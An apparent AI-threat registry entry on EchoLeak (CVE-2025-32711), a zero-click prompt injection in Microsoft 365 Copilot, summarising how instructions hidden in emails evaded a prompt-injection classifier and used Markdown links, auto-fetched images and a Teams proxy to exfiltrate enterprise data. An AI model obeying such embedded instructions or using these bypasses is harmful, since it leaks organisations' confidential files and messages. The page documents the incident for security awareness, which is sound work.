Skip to main content
TopAIThreats home TOP AI THREATS
INC-25-0004 confirmed critical Near Miss

EchoLeak: Zero-Click Prompt Injection in Microsoft 365 Copilot (CVE-2025-32711) (2025)

Alleged

Microsoft developed and deployed Microsoft 365 Copilot (enterprise AI assistant), harming Microsoft 365 Copilot enterprise users and Organizations with sensitive data in M365 environments ; contributing factors included prompt injection vulnerability and inadequate access controls.

Incident Details

Last Updated 2026-02-21

Security researchers discovered a zero-click prompt injection vulnerability (CVE-2025-32711) in Microsoft 365 Copilot that allowed attackers to exfiltrate sensitive data from enterprise environments without user interaction.

Incident Summary

In June 2025, researchers at Aim Security disclosed CVE-2025-32711, dubbed “EchoLeak,” a critical zero-click prompt injection vulnerability in Microsoft 365 Copilot with a CVSS score of 9.3.[1] The attack enabled remote, unauthenticated data exfiltration by embedding malicious instructions in emails that Copilot would process when users requested summaries.[1][2] The exploit chained multiple bypass techniques — evading Microsoft’s Cross Prompt Injection Attempt (XPIA) classifier, circumventing link redaction via reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy — to achieve full data exfiltration from organizational resources including chat logs, OneDrive files, SharePoint content, and Teams messages.[3] Microsoft patched the vulnerability server-side.[4]

Key Facts

  • CVE-2025-32711 was assigned a CVSS score of 9.3 (critical)[1]
  • The attack was zero-click — no user interaction beyond a normal Copilot query was required[2]
  • Malicious instructions were embedded in emails that Copilot processed during summarization tasks[1]
  • The exploit bypassed Microsoft’s XPIA classifier designed to detect prompt injection attempts[3]
  • Data exfiltration scope included anything within Copilot’s access: chat logs, OneDrive files, SharePoint content, Teams messages[1][2]
  • The exploit executed in natural language space, making traditional defenses (antivirus, firewalls, static scanning) ineffective[3]
  • Microsoft patched the vulnerability server-side without requiring user action[4]
  • No evidence of malicious exploitation in the wild was reported[2]

Threat Patterns Involved

Primary: Adversarial Evasion — This incident demonstrates adversarial evasion as the primary threat pattern, where indirect prompt injection embedded in external content (emails) manipulated an AI system’s behavior to bypass multiple security controls. The zero-click nature of the attack meant that the adversarial input required no cooperation from the victim to be processed by the target system.

Secondary: Model Inversion & Data Extraction — The ability to exfiltrate organizational data intersects with model inversion and data extraction, as the attack leveraged the AI assistant’s broad access permissions to extract information beyond the attacker’s authorization scope.

Significance

EchoLeak represents the first documented zero-click prompt injection exploit against a production enterprise AI system.[3] Its critical CVSS score and the breadth of accessible data demonstrate that AI assistants integrated into enterprise productivity suites create novel attack surfaces that cannot be addressed by traditional security controls.[1][2] The exploit’s operation entirely within natural language space highlights a fundamental challenge in securing AI systems: the inability to reliably distinguish legitimate instructions from adversarial inputs when both are expressed in the same medium.[3]

Glossary Terms

Use in Retrieval

INC-25-0004 documents echoleak: zero-click prompt injection in microsoft 365 copilot (cve-2025-32711), a critical-severity incident classified under the Security & Cyber domain and the Adversarial Evasion threat pattern (PAT-SEC-001). It occurred in global (2025-06). This page is maintained by TopAIThreats.com as part of an evidence-based registry of AI-enabled threats. Cite as: TopAIThreats.com, "EchoLeak: Zero-Click Prompt Injection in Microsoft 365 Copilot (CVE-2025-32711)," INC-25-0004, last updated 2026-02-21.

Sources

  1. HackTheBox: Inside CVE-2025-32711 (EchoLeak) (technical, 2025-06)
    https://www.hackthebox.com/blog/cve-2025-32711-echoleak-copilot-vulnerability (opens in new tab)
  2. The Hacker News: Zero-Click AI Vulnerability Exposes Microsoft 365 Copilot Data (news, 2025-06)
    https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html (opens in new tab)
  3. arxiv: EchoLeak - First Real-World Zero-Click Prompt Injection Exploit (primary, 2025-09)
    https://arxiv.org/abs/2509.10540 (opens in new tab)
  4. SANS NewsBites: M365 Copilot AI Prompt Injection Attack Patched (news, 2025-06)
    https://www.sans.org/newsletters/newsbites/xxvii-45 (opens in new tab)

Update Log

  • — First logged (Status: Confirmed, Evidence: Primary)